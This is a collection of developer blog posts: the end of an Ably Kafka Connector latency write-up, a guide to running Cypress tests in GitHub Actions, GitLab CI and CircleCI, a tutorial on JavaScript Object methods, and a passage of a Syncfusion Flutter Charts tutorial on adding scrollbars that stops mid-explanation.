Looking ahead, our focus is on developing solutions that increase parallelism without disrupting message order. We understand that maintaining the correct sequence of messages is crucial for various applications. We are actively exploring several strategies to overcome this limitation and will share our findings soon. ## How our Ably Kafka Connector insights apply elsewhere The insights and optimizations we explored are not limited to the Ably Kafka Connector; they can be applied broadly to any Kafka Connector to improve performance and reduce latency. Here are some general principles and strategies that can be universally beneficial: ### Understanding and optimizing built-in Kafka configuration **1. Partitions and tasks management:** - **Partitions:** Carefully consider the number of partitions. While increasing partitions can enhance parallel processing, it can also introduce complexity and overhead. - **Tasks:** Adjusting the tasks.max setting can help balance concurrency and resource utilization. Our research showed that using a single task minimized latency in our scenario, but this might vary depending on the specific use case. **2. Simple converters:** Using simpler converters, such as the built-in String converter, can reduce the overhead associated with serialization and deserialization. This approach is particularly effective when the data format, like JSON, is natively supported by the target system. ### Optimizing connector-specific settings **1. Batching mechanisms:** While batching can reduce the number of requests sent to external systems, our findings indicate that even small batching intervals can increase latency. Evaluate the impact of batching on latency and throughput carefully. **2. Thread pool configuration:** Increasing the number of threads in the connector’s internal thread pool can significantly reduce latency by allowing more messages to be processed in parallel. However, be mindful of the trade-offs, such as potential issues with message ordering. Although these settings are specific to the Ably Kafka Connector, similar options often exist in other Kafka Sink Connectors. 
Adjusting batch sizes, thread pools, and other configuration parameters can be effective ways to optimize performance. ## Conclusion Through our experiments with the Ably Kafka Connector, we have successfully achieved impressive latency metrics. With a moderate message load of approximately 2,400 messages per second, we observed a median (p50) latency of around 100ms and a 99th percentile (p99) latency of approximately 150ms. These numbers reflect the total time it takes for data to travel from the publisher to the Kafka cluster, within the Kafka cluster itself, and from the Kafka Connector to the Ably service.
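As a closing illustration of the tracing setup described earlier, here is a hedged sketch of how the custom `textMapGetter` shown above plugs into the OpenTelemetry propagator API when a record arrives at the connector. The helper class, span name, and tracer scope name are illustrative assumptions; only the getter and the extract call mirror the snippets above:

```java
import io.opentelemetry.api.GlobalOpenTelemetry;
import io.opentelemetry.api.trace.Span;
import io.opentelemetry.api.trace.SpanKind;
import io.opentelemetry.api.trace.Tracer;
import io.opentelemetry.context.Context;
import io.opentelemetry.context.Scope;
import io.opentelemetry.context.propagation.TextMapGetter;
import org.apache.kafka.connect.sink.SinkRecord;

public final class TraceHelper {

    // The scope name is an arbitrary label for this instrumentation.
    private static final Tracer tracer =
            GlobalOpenTelemetry.getTracer("ably-kafka-connector");

    // Extract the upstream trace context from the record headers and
    // record a span around the publish action.
    public static void tracePublish(
            SinkRecord record,
            TextMapGetter<SinkRecord> getter, // e.g. the textMapGetter defined earlier
            Runnable publish) {
        Context extracted = GlobalOpenTelemetry.getPropagators()
                .getTextMapPropagator()
                .extract(Context.current(), record, getter);

        Span span = tracer.spanBuilder("ably.publish")
                .setSpanKind(SpanKind.PRODUCER)
                .setParent(extracted)
                .startSpan();
        try (Scope scope = span.makeCurrent()) {
            publish.run();
        } finally {
            span.end();
        }
    }
}
```

Starting the span with the extracted context as its parent is what ties the connector-side span to the trace the load-testing tool embedded in the message headers, which is how the end-to-end latency picture above is stitched together.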
ttypic
1,921,175
Integrating Cypress with CI/CD Pipelines: A Step-by-Step Guide
Introduction Continuous Integration (CI) and Continuous Deployment (CD) are essential...
0
2024-07-13T05:17:46
https://dev.to/aswani25/integrating-cypress-with-cicd-pipelines-a-step-by-step-guide-1kck
webdev, javascript, testing, cypress
## Introduction

Continuous Integration (CI) and Continuous Deployment (CD) are essential practices in modern software development. They ensure that code changes are automatically tested and deployed, leading to faster development cycles and higher quality software. Cypress, a powerful end-to-end testing framework, can be seamlessly integrated into CI/CD pipelines to automate the testing process. In this post, we'll explore how to integrate Cypress with popular CI/CD tools, providing a step-by-step guide to set up and configure your pipeline.

## Why Integrate Cypress with CI/CD?

Integrating Cypress with CI/CD offers several benefits:

1. **Automated Testing:** Automatically run your tests on every code change, ensuring that your application remains stable.
2. **Fast Feedback:** Quickly identify and fix issues by receiving immediate feedback on code changes.
3. **Consistency:** Ensure consistent testing environments across different machines.
4. **Scalability:** Easily scale your testing efforts by integrating with various CI/CD tools and services.

## Prerequisites

Before we begin, ensure you have the following:

- A Cypress project set up (if not, follow the official Cypress documentation).
- A repository on GitHub, GitLab, Bitbucket, or another version control system.
- Basic knowledge of CI/CD concepts.

## Integrating Cypress with GitHub Actions

GitHub Actions is a popular CI/CD tool that integrates seamlessly with GitHub repositories. Follow these steps to integrate Cypress with GitHub Actions:

**Step 1: Create a GitHub Actions Workflow**

In your repository, create a directory named `.github/workflows` if it doesn't already exist. Inside this directory, create a file named `cypress.yml`:

```yaml
name: Cypress Tests

on: [push, pull_request]

jobs:
  cypress-run:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v2

      - name: Setup Node.js
        uses: actions/setup-node@v2
        with:
          node-version: '14'

      - name: Install dependencies
        run: npm install

      - name: Run Cypress tests
        run: npx cypress run
```

**Step 2: Commit and Push**

Commit the `cypress.yml` file to your repository and push it to GitHub:

```bash
git add .github/workflows/cypress.yml
git commit -m "Add Cypress CI workflow"
git push origin main
```

GitHub Actions will automatically detect the workflow file and run Cypress tests on every push and pull request.

## Integrating Cypress with GitLab CI/CD

GitLab CI/CD is another powerful CI/CD tool that integrates well with GitLab repositories. Follow these steps to integrate Cypress with GitLab CI/CD:

**Step 1: Create a GitLab CI/CD Pipeline**

In your repository, create a file named `.gitlab-ci.yml`:

```yaml
stages:
  - test

cypress_tests:
  image: cypress/base:14.16.0
  stage: test
  script:
    - npm install
    - npx cypress run
  artifacts:
    when: always
    paths:
      - cypress/screenshots
      - cypress/videos
    reports:
      # note: this file is only produced if a JUnit reporter is configured
      # in your Cypress setup with a matching output path
      junit:
        - cypress/results/junit-report.xml
```

**Step 2: Commit and Push**

Commit the `.gitlab-ci.yml` file to your repository and push it to GitLab:

```bash
git add .gitlab-ci.yml
git commit -m "Add Cypress CI pipeline"
git push origin main
```

GitLab CI/CD will automatically detect the pipeline file and run Cypress tests on every push.

## Integrating Cypress with CircleCI

CircleCI is a widely used CI/CD tool that supports a variety of configurations. Follow these steps to integrate Cypress with CircleCI:

**Step 1: Create a CircleCI Configuration**

In your repository, create a directory named `.circleci` if it doesn't already exist.
Inside this directory, create a file named `config.yml`:

```yaml
version: 2.1

jobs:
  cypress:
    docker:
      - image: cypress/base:14.16.0
    steps:
      - checkout
      - run:
          name: Install dependencies
          command: npm install
      - run:
          name: Run Cypress tests
          command: npx cypress run

workflows:
  version: 2
  test:
    jobs:
      - cypress
```

**Step 2: Commit and Push**

Commit the `config.yml` file to your repository and push it; CircleCI will detect the new configuration:

```bash
git add .circleci/config.yml
git commit -m "Add CircleCI Cypress configuration"
git push origin main
```

CircleCI will automatically detect the configuration file and run Cypress tests on every push.

## Best Practices for CI/CD Integration

1. **Parallelization:** Use parallelization to speed up test execution by splitting tests across multiple CI workers (see the sketch after the conclusion below).
2. **Artifacts:** Save test artifacts (e.g., screenshots, videos) for debugging purposes.
3. **Environment Variables:** Use environment variables to manage sensitive data and configurations.
4. **Notifications:** Set up notifications to alert your team of test failures.

## Conclusion

Integrating Cypress with CI/CD pipelines is a powerful way to automate your testing process, ensuring that your application remains stable and reliable. By following the steps outlined in this guide, you can seamlessly integrate Cypress with popular CI/CD tools like GitHub Actions, GitLab CI/CD, and CircleCI. Embrace the power of automation and enhance your development workflow with Cypress and CI/CD.

Happy testing!
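As a hedged sketch of the parallelization tip above: if you have a Cypress Cloud project and a record key stored as a CI secret, a GitHub Actions matrix can split one run across several containers. The container count, secret name, and versions below are illustrative assumptions, not required values:

```yaml
name: Cypress Parallel Tests

on: [push, pull_request]

jobs:
  cypress-run:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        containers: [1, 2, 3]   # three workers run the same job in parallel
    steps:
      - uses: actions/checkout@v2

      - uses: actions/setup-node@v2
        with:
          node-version: '14'

      - run: npm install

      # --parallel requires recording to Cypress Cloud, hence --record and the key
      - run: npx cypress run --record --parallel
        env:
          CYPRESS_RECORD_KEY: ${{ secrets.CYPRESS_RECORD_KEY }}
```

Cypress Cloud then load-balances the spec files across the containers, so the wall-clock time of the run drops roughly with the number of workers.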
aswani25
1,921,178
A Guide to Master JavaScript-Objects
Objects are a fundamental part of JavaScript, serving as the backbone for storing and managing data....
28,049
2024-07-15T13:09:00
https://dev.to/imsushant12/a-guide-to-master-javascript-objects-362b
webdev, javascript, beginners, programming
Objects are a fundamental part of JavaScript, serving as the backbone for storing and managing data. An object is a collection of properties, and each property is an association between a key (or name) and a value. Understanding how to create, manipulate, and utilize objects is crucial for any JavaScript developer. In this article, we’ll explore the various object functions in JavaScript, providing detailed explanations, examples, and comments to help you master them.

### Introduction to Objects in JavaScript

In JavaScript, objects are used to store collections of data and more complex entities. They are created using object literals or the `Object` constructor.

```javascript
// Using object literals
let person = {
  name: "John",
  age: 30,
  city: "New York"
};

// Using the Object constructor (reusing the same variable;
// a second `let person` in the same scope would be a SyntaxError)
person = new Object();
person.name = "John";
person.age = 30;
person.city = "New York";
```

### Object Properties

- **`Object.prototype`**: Every JavaScript object inherits properties and methods from its prototype.

```javascript
let obj = {};
console.log(obj.__proto__ === Object.prototype); // Output: true
```

### Object Methods

#### 1. `Object.assign()`

Copies the values of all enumerable own properties from one or more source objects to a target object. It returns the target object.

```javascript
let target = {a: 1};
let source = {b: 2, c: 3};
Object.assign(target, source);
console.log(target); // Output: {a: 1, b: 2, c: 3}
```

#### 2. `Object.create()`

Creates a new object with the specified prototype object and properties.

```javascript
let person = {
  isHuman: false,
  printIntroduction: function() {
    console.log(`My name is ${this.name}. Am I human? ${this.isHuman}`);
  }
};

let me = Object.create(person);
me.name = "Matthew";
me.isHuman = true;
me.printIntroduction(); // Output: My name is Matthew. Am I human? true
```

#### 3. `Object.defineProperties()`

Defines new or modifies existing properties directly on an object, returning the object.

```javascript
let obj = {};
Object.defineProperties(obj, {
  property1: {
    value: true,
    writable: true
  },
  property2: {
    value: "Hello",
    writable: false
  }
});
console.log(obj.property1, obj.property2); // Output: true 'Hello'
// note: properties defined this way are non-enumerable by default,
// so console.log(obj) may print just {}
```

#### 4. `Object.defineProperty()`

Defines a new property directly on an object or modifies an existing property and returns the object.

```javascript
let obj = {};
Object.defineProperty(obj, 'property1', {
  value: 42,
  writable: false
});
console.log(obj.property1); // Output: 42
obj.property1 = 77; // Fails silently in non-strict mode; the property is not writable
console.log(obj.property1); // Output: 42
```

#### 5. `Object.entries()`

Returns an array of a given object's own enumerable string-keyed property [key, value] pairs.

```javascript
let obj = {a: 1, b: 2, c: 3};
console.log(Object.entries(obj)); // Output: [['a', 1], ['b', 2], ['c', 3]]
```

#### 6. `Object.freeze()`

Freezes an object. A frozen object can no longer be changed; freezing an object prevents new properties from being added to it, existing properties from being removed, and prevents the values of existing properties from being changed.

```javascript
let obj = {prop: 42};
Object.freeze(obj);
obj.prop = 33; // Fails silently in non-strict mode
console.log(obj.prop); // Output: 42
```

#### 7. `Object.fromEntries()`

Transforms a list of key-value pairs into an object.

```javascript
let entries = new Map([['foo', 'bar'], ['baz', 42]]);
let obj = Object.fromEntries(entries);
console.log(obj); // Output: { foo: 'bar', baz: 42 }
```

#### 8.
`Object.getOwnPropertyDescriptor()` Returns a property descriptor for an own property (that is, one directly present on an object and not in the object's prototype chain) of a given object. ```javascript let obj = {property1: 42}; let descriptor = Object.getOwnPropertyDescriptor(obj, 'property1'); console.log(descriptor); // Output: { value: 42, writable: true, enumerable: true, configurable: true } ``` #### 9. `Object.getOwnPropertyDescriptors()` Returns an object containing all own property descriptors of an object. ```javascript let obj = {property1: 42}; let descriptors = Object.getOwnPropertyDescriptors(obj); console.log(descriptors); /* Output: { property1: { value: 42, writable: true, enumerable: true, configurable: true } } */ ``` #### 10. `Object.getOwnPropertyNames()` Returns an array of all properties (including non-enumerable properties except for those which use Symbol) found directly upon a given object. ```javascript let obj = {a: 1, b: 2, c: 3}; let props = Object.getOwnPropertyNames(obj); console.log(props); // Output: ['a', 'b', 'c'] ``` #### 11. `Object.getOwnPropertySymbols()` Returns an array of all symbol properties found directly upon a given object. ```javascript let obj = {}; let sym = Symbol('foo'); obj[sym] = 'bar'; let symbols = Object.getOwnPropertySymbols(obj); console.log(symbols); // Output: [Symbol(foo)] ``` #### 12. `Object.getPrototypeOf()` Returns the prototype (i.e., the value of the internal `[[Prototype]]` property) of the specified object. ```javascript let proto = {}; let obj = Object.create(proto); console.log(Object.getPrototypeOf(obj) === proto); // Output: true ``` #### 13. `Object.is()` Determines whether two values are the same value. ```javascript console.log(Object.is('foo', 'foo')); // Output: true console.log(Object.is({}, {})); // Output: false ``` #### 14. `Object.isExtensible()` Determines if extending of an object is allowed. ```javascript let obj = {}; console.log(Object.isExtensible(obj)); // Output: true Object.preventExtensions(obj); console.log(Object.isExtensible(obj)); // Output: false ``` #### 15. `Object.isFrozen()` Determines if an object is frozen. ```javascript let obj = {}; console.log(Object.isFrozen(obj)); // Output: false Object.freeze(obj); console.log(Object.isFrozen(obj)); // Output: true ``` #### 16. `Object.isSealed()` Determines if an object is sealed. ```javascript let obj = {}; console.log(Object.isSealed(obj)); // Output: false Object.seal(obj); console.log(Object.isSealed(obj)); // Output: true ``` #### 17. `Object.keys()` Returns an array of a given object's own enumerable property names, iterated in the same order that a normal loop would. ```javascript let obj = {a: 1, b: 2, c: 3}; console.log(Object.keys(obj)); // Output: ['a', 'b', 'c'] ``` #### 18. `Object.preventExtensions()` Prevents any extensions of an object. ```javascript let obj = {}; Object.preventExtensions(obj); obj.newProp = 'test'; // Throws an error in strict mode console.log(obj.newProp); // Output: undefined ``` #### 19. `Object.seal()` Seals an object, preventing new properties from being added to it and marking all existing properties as non-configurable. Values of present properties can still be changed as long as they are writable. ```javascript let obj = {property1: 42}; Object.seal(obj); obj.property1 = 33; delete obj.property1; // Throws an error in strict mode console.log(obj.property1); // Output: 33 ``` #### 20. 
`Object.setPrototypeOf()` Sets the prototype (i.e., the internal `[[Prototype]]` property) of a specified object to another object or `null`. ```javascript let proto = {}; let obj = {}; Object.setPrototypeOf(obj, proto); console.log(Object.getPrototypeOf(obj) === proto); // Output: true ``` #### 21. `Object.values()` Returns an array of a given object's own enumerable property values, in the same order as that provided by a for...in loop. ```javascript let obj = {a: 1, b: 2, c: 3}; console.log(Object.values(obj)); // Output: [1, 2, 3] ``` ### Practical Examples #### Example 1: Cloning an Object Using `Object.assign()` to clone an object. ```javascript let obj = {a: 1, b: 2}; let clone = Object.assign({}, obj); console.log(clone); // Output: {a: 1, b: 2} ``` #### Example 2: Merging Objects Using `Object.assign()` to merge objects. ```javascript let obj1 = {a: 1, b: 2}; let obj2 = {b: 3, c: 4}; let merged = Object.assign({}, obj1, obj2); console.log(merged); // Output: {a: 1, b: 3, c: 4} ``` #### Example 3: Creating an Object with a Specified Prototype Using `Object.create()` to create an object with a specified prototype. ```javascript let proto = {greet: function() { console.log("Hello!"); }}; let obj = Object.create(proto); obj.greet(); // Output: Hello! ``` #### Example 4: Defining Immutable Properties Using `Object.defineProperty()` to define immutable properties. ```javascript let obj = {}; Object.defineProperty(obj, 'immutableProp', { value: 42, writable: false }); console.log(obj.immutableProp); // Output: 42 obj.immutableProp = 77; // Throws an error in strict mode console.log(obj.immutableProp); // Output: 42 ``` #### Example 5: Converting an Object to an Array Using `Object.entries()` to convert an object to an array of key-value pairs. ```javascript let obj = {a: 1, b: 2, c: 3}; let entries = Object.entries(obj); console.log(entries); // Output: [['a', 1], ['b', 2], ['c', 3]] ``` ### Conclusion Objects are a core component of JavaScript, offering a flexible way to manage and manipulate data. By mastering object functions, you can perform complex operations with ease and write more efficient and maintainable code. This comprehensive guide has covered the most important object functions in JavaScript, complete with detailed examples and explanations. Practice using these functions and experiment with different use cases to deepen your understanding and enhance your coding skills.
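One caveat worth adding to Example 1: `Object.assign()` makes a *shallow* copy, so nested objects are still shared between the clone and the original. A small illustration, using the standard `structuredClone()` (available in modern browsers and Node.js 17+) for a true deep copy:

```javascript
let original = {a: 1, nested: {b: 2}};

// Shallow copy: top-level properties are copied,
// but `nested` still points to the same object
let shallow = Object.assign({}, original);
shallow.nested.b = 99;
console.log(original.nested.b); // Output: 99 (the original was affected!)

// Deep copy: nested objects are duplicated as well
let deep = structuredClone(original);
deep.nested.b = 42;
console.log(original.nested.b); // Output: 99 (unchanged this time)
```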
imsushant12
1,921,199
How to add a scrollbar to Syncfusion Flutter Charts
TL;DR: Learn to add scrollbars to Syncfusion Flutter Charts using the Range Slider and Range Selector...
0
2024-07-17T16:14:02
https://www.syncfusion.com/blogs/post/adding-scrollbar-in-flutter-charts
flutter, chart, mobile, desktop
--- title: How to add a scrollbar to Syncfusion Flutter Charts published: true date: 2024-07-12 09:46:37 UTC tags: flutter, chart, mobile, desktop canonical_url: https://www.syncfusion.com/blogs/post/adding-scrollbar-in-flutter-charts cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tmxcitsew4651of8kzqg.png --- **TL;DR:** Learn to add scrollbars to Syncfusion Flutter Charts using the Range Slider and Range Selector widgets. This guide provides step-by-step instructions and code examples to enhance chart navigation. Perfect for seamless zooming and panning. Check it out! Syncfusion [Flutter Charts](https://www.syncfusion.com/flutter-widgets/flutter-charts "Flutter Charts") contains a rich gallery of 30+ charts and graphs, ranging from line to financial charts, that cater to all charting scenarios. In this blog, we will explore how to add a scrollbar in Flutter Charts to track the zoom and pan progress and its limits. The scrollbar feature is not built into our Flutter Charts; however, we can add it using the [SfRangeSlider](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSlider-class.html "SfRangeSlider class for Flutter") and [SfRangeSelector](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSelector-class.html "SfRangeSelector class for Flutter") widgets. Let’s walk through the steps to achieve the same. ## Adding a mini-map scrollbar The [SfRangeSelector](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSelector-class.html "SfRangeSelector class for Flutter") widget is used to select a range of values between the set minimum and maximum values, and it can accept any widget as its child. One unique feature of the **SfRangeSelector** is its ability to map the range selection in [SfCartesianChart](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/SfCartesianChart-class.html "SfCartesianChart class for Flutter"), making it function as a mini-map scrollbar. This is achieved through the use of the [RangeController](https://pub.dev/documentation/syncfusion_flutter_core/latest/core/RangeController-class.html "RangeController class for Flutter"). The **SfRangeSelector** has a controller property of type **RangeController**, which updates whenever the range of the SfRangeSelector changes through interaction. On the other hand, the **SfCartesianChart** supports a built-in option to listen to and update the RangeController through the **rangeController** property of the [Numeric](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/NumericAxis-class.html "NumericAxis class for Flutter") and [DateTime](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/DateTimeAxis-class.html "DateTimeAxis class for Flutter") axes. Whenever the range of the [CartesianSeries](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/CartesianSeries-class.html "CartesianSeries<T, D> class for Flutter") changes due to zooming, panning, or direct range-related APIs, the **RangeController** is updated internally in the Charts, similar to the **SfRangeSelector**. The **RangeController** is a notifier to which the chart and range selector listen. Therefore, whenever the start and end values change in the **RangeController**, the chart and range selector update themselves. Let’s create a chart and initialize the data source. Here, I have currently prepared a working sample with random data. 
```dart
// Assumed sample state - the post does not show these declarations.
// (Random requires `import 'dart:math';`; _dataCount and _baseValue
// are illustrative values.)
final Random _random = Random();
final int _dataCount = 180;
double _baseValue = 60;
late List<ChartData> _chartData;
late DateTime _startRange;
late DateTime _endRange;
RangeController? _rangeController;

num _yValue() {
  if (_random.nextDouble() > 0.5) {
    _baseValue += _random.nextDouble();
    return _baseValue;
  } else {
    _baseValue -= _random.nextDouble();
    return _baseValue;
  }
}

@override
void initState() {
  DateTime date = DateTime(2020);
  _chartData = List.generate(_dataCount + 1, (int index) {
    final List<num> values = [_yValue(), _yValue(), _yValue(), _yValue()];
    values.sort();
    // After the ascending sort, the last element is the highest value
    // and the first is the lowest.
    return ChartData(
      x: date.add(Duration(days: index)),
      high: values[3],
      low: values[0],
      open: values[1],
      close: values[2],
    );
  });
  _startRange = _chartData[0].x;
  _endRange = _chartData[_dataCount].x;
  _rangeController = RangeController(
    start: _startRange,
    end: _endRange,
  );
  super.initState();
}

@override
Widget build(BuildContext context) {
  ...
  SfCartesianChart(
    margin: EdgeInsets.zero,
    primaryXAxis: const DateTimeAxis(),
    primaryYAxis: const NumericAxis(
      opposedPosition: true,
    ),
    series: <CartesianSeries<ChartData, DateTime>>[
      CandleSeries(
        dataSource: _chartData,
        xValueMapper: (ChartData data, int index) => data.x,
        highValueMapper: (ChartData data, int index) => data.high,
        lowValueMapper: (ChartData data, int index) => data.low,
        openValueMapper: (ChartData data, int index) => data.open,
        closeValueMapper: (ChartData data, int index) => data.close,
      ),
    ],
  ),
  ...
}

// Minimal data model assumed by this sample (not shown in the post).
class ChartData {
  ChartData({
    required this.x,
    required this.high,
    required this.low,
    required this.open,
    required this.close,
  });

  final DateTime x;
  final num high;
  final num low;
  final num open;
  final num close;
}
```

The y-axis range will be calculated from 0 as the default range padding is [ChartRangePadding.normal](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/ChartRangePadding.html#normal "ChartRangePadding.normal property for Flutter"). Set the range padding of the [NumericAxis](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/NumericAxis-class.html "NumericAxis class for Flutter") to [ChartRangePadding.round](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/ChartRangePadding.html#round "ChartRangePadding.round property for Flutter"), which calculates and displays the y-axis range only for the available data points.

```dart
primaryYAxis: const NumericAxis(
  ...
  rangePadding: ChartRangePadding.round,
)
```

Add the [ZoomPanBehavior](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/ZoomPanBehavior-class.html "ZoomPanBehavior class for Flutter") to zoom and pan the chart. Here, the zoom mode is set to **X** because the range selector has no vertical orientation, so we can use it for one-direction (horizontal) zooming.

```dart
late ZoomPanBehavior _zoomPanBehavior;

@override
void initState() {
  _zoomPanBehavior = ZoomPanBehavior(
    enablePanning: true,
    zoomMode: ZoomMode.x,
  );
  ...
}

SfCartesianChart(
  ...
  zoomPanBehavior: _zoomPanBehavior,
  ...
)
```

Now, create the [SfRangeSelector](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSelector-class.html "SfRangeSelector class for Flutter") and set the min and max values from the chart data source. Since the **SfRangeSelector** does not have built-in auto interval calculation support, we need to set the [interval](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSelector/interval.html "interval property for Flutter"), [dateFormat](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSelector/dateFormat.html "dateFormat property for Flutter"), and [dateIntervalType](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSelector/dateIntervalType.html "dateIntervalType property for Flutter") properties manually.
In the following code example, we'll customize the **Jan** label with its year using the [labelFormatterCallback](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSelector/labelFormatterCallback.html "labelFormatterCallback property for Flutter") event for better visual appeal. Since the **SfRangeSelector** acts as a mini-map, we can add any cartesian series (based on need) as its child and map the same data source used above.

```dart
// Note: DateFormat comes from `package:intl/intl.dart`, and `colorScheme`
// here is assumed to be `Theme.of(context).colorScheme`.
SfRangeSelectorTheme(
  data: SfRangeSelectorThemeData(
    thumbRadius: 0,
    overlayRadius: 0,
    activeRegionColor: colorScheme.primary.withOpacity(0.12),
    inactiveRegionColor: Colors.transparent,
  ),
  child: SfRangeSelector(
    min: _startRange,
    max: _endRange,
    showTicks: true,
    showLabels: true,
    interval: 1,
    dateIntervalType: DateIntervalType.months,
    dateFormat: DateFormat.MMM(),
    labelPlacement: LabelPlacement.betweenTicks,
    labelFormatterCallback: (dynamic actualValue, String formattedText) {
      if (formattedText.contains('Jan')) {
        final year = DateFormat('yyyy').format(actualValue);
        return ' $year $formattedText';
      }
      return formattedText;
    },
    child: SfCartesianChart(
      ...
    ),
  ),
)
```

Now, wrap the Flutter Charts and the Range Selector widgets in a [Column](https://api.flutter.dev/flutter/widgets/Column-class.html "Column class for Flutter") widget. Then, create a range controller and assign it to the chart and the range selector.

```dart
RangeController? _rangeController;

@override
void initState() {
  ...
  _rangeController = RangeController(
    start: _startRange,
    end: _endRange,
  );
  super.initState();
}

@override
Widget build(BuildContext context) {
  ...
  Column(
    children: <Widget>[
      Expanded(
        child: SfCartesianChart(
          margin: EdgeInsets.zero,
          primaryXAxis: DateTimeAxis(
            rangeController: _rangeController,
          ),
          ...
        ),
      ),
      Container(
        height: 150,
        padding: const EdgeInsets.only(bottom: 10),
        child: SfRangeSelectorTheme(
          ...
          child: SfRangeSelector(
            min: _startRange,
            max: _endRange,
            controller: _rangeController,
            ...
          ),
        ),
      ),
    ],
  )
  ...
}
```

That's it. Now, whenever the axis range changes in the Flutter Chart, the Range Selector updates accordingly, and interacting with the Range Selector changes the Chart's visible range. Refer to the following image.

<figure> <img src="https://www.syncfusion.com/blogs/wp-content/uploads/2024/07/Adding-a-mini-map-scrollbar-in-the-Flutter-Charts.gif" alt="Adding a mini-map scrollbar in the Flutter Charts" style="width:100%"> <figcaption>Adding a mini-map scrollbar in the Flutter Charts</figcaption> </figure>

## Adding a scrollbar on X-axis

This can be achieved by using the [SfRangeSelector](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSelector-class.html "SfRangeSelector class for Flutter") with an empty [SizedBox](https://api.flutter.dev/flutter/widgets/SizedBox-class.html "SizedBox class for Flutter") as its child and placing it on the x-axis using the Flutter Charts [annotation](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/SfCartesianChart/annotations.html "annotation property for Flutter") property. Let's have the actual Chart's data point range as the range of the SfRangeSelector and make it a scrollbar on the X-axis.

To display the default scrollbar UI, remove the thumb and overlay from the SfRangeSelector using the SfRangeSelectorTheme.

Initialize the data source and find its minimum and maximum values.
Set these values as the range for the SfRangeSelector. Refer to the following code example.

```dart
late List<ChartData> _chartData;
late DateTime _xScrollbarStartRange;
late DateTime _xScrollbarEndRange;
RangeController? _xScrollbarController;

@override
void initState() {
  ...
  _xScrollbarStartRange = _chartData[0].x;
  _xScrollbarEndRange = _chartData[_dataCount].x;
  _xScrollbarController = RangeController(
    start: _xScrollbarStartRange,
    end: _xScrollbarEndRange,
  );
  super.initState();
}

SfCartesianChart(
  ...
  series: <CartesianSeries<ChartData, DateTime>>[
    HiloOpenCloseSeries(
      dataSource: _chartData,
      ...
    ),
  ],
  zoomPanBehavior: _zoomPanBehavior,
  ...
)

SfRangeSelectorTheme(
  data: const SfRangeSelectorThemeData(
    thumbRadius: 0,
    overlayRadius: 0,
  ),
  child: SfRangeSelector(
    min: _xScrollbarStartRange,
    max: _xScrollbarEndRange,
    child: const SizedBox(height: 0),
  ),
)
```

Create a range controller and assign it to both the chart's axis and the range selector so they will map to each other and get updated when the range changes.

```dart
void initState() {
  ...
  _xScrollbarController = RangeController(
    start: _xScrollbarStartRange,
    end: _xScrollbarEndRange,
  );
  super.initState();
}

@override
Widget build(BuildContext context) {
  SfCartesianChart(
    margin: EdgeInsets.zero,
    primaryXAxis: DateTimeAxis(
      rangeController: _xScrollbarController,
    ),
    ...
  )

  SfRangeSelector(
    min: _xScrollbarStartRange,
    max: _xScrollbarEndRange,
    controller: _xScrollbarController,
    showTicks: true,
    ...
  )
```

Now, add an annotation to the chart and place the [SfRangeSelector](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSelector-class.html "SfRangeSelector class for Flutter") as a child of the annotation.

```dart
SfCartesianChart(
  ...
  annotations: [
    CartesianChartAnnotation(
      widget: SfRangeSelectorTheme(
        data: const SfRangeSelectorThemeData(
          thumbRadius: 0,
          overlayRadius: 0,
        ),
        child: SfRangeSelector(
          min: _xScrollbarStartRange,
          max: _xScrollbarEndRange,
          controller: _xScrollbarController,
          child: const SizedBox(height: 0),
        ),
      ),
    ),
  ],
)
```

In order to position the range selector on the x-axis, we need to determine the top left position of the x-axis, which is the same as the bottom left position of the plot area. To get the plot area (series) size, write a custom series renderer for the [CartesianSeries](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/CartesianSeries-class.html "CartesianSeries<T, D> class for Flutter") and override its [performLayout](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/CartesianSeriesRenderer/performLayout.html "performLayout method for Flutter") method. After calling the **super.performLayout** method, you can obtain the size of the series. Refer to the following code example.

```dart
series: <CartesianSeries<ChartData, DateTime>>[
  HiloOpenCloseSeries(
    ...
    onCreateRenderer: (ChartSeries<ChartData, DateTime> series) {
      return _HiloOpenCloseSeriesRenderer(this);
    },
  ),
]

class _HiloOpenCloseSeriesRenderer extends HiloOpenCloseSeriesRenderer<ChartData, DateTime> {
  _HiloOpenCloseSeriesRenderer(this._state);

  final _ChartWithRangeSliderState _state;

  @override
  void performLayout() {
    super.performLayout();
    _state._updateScrollBarSize(size);
  }
}
```

After obtaining the size, modify the annotation position through the [postFrameCallback](https://api.flutter.dev/flutter/scheduler/SchedulerBinding/addPostFrameCallback.html "addPostFrameCallback method for Flutter").
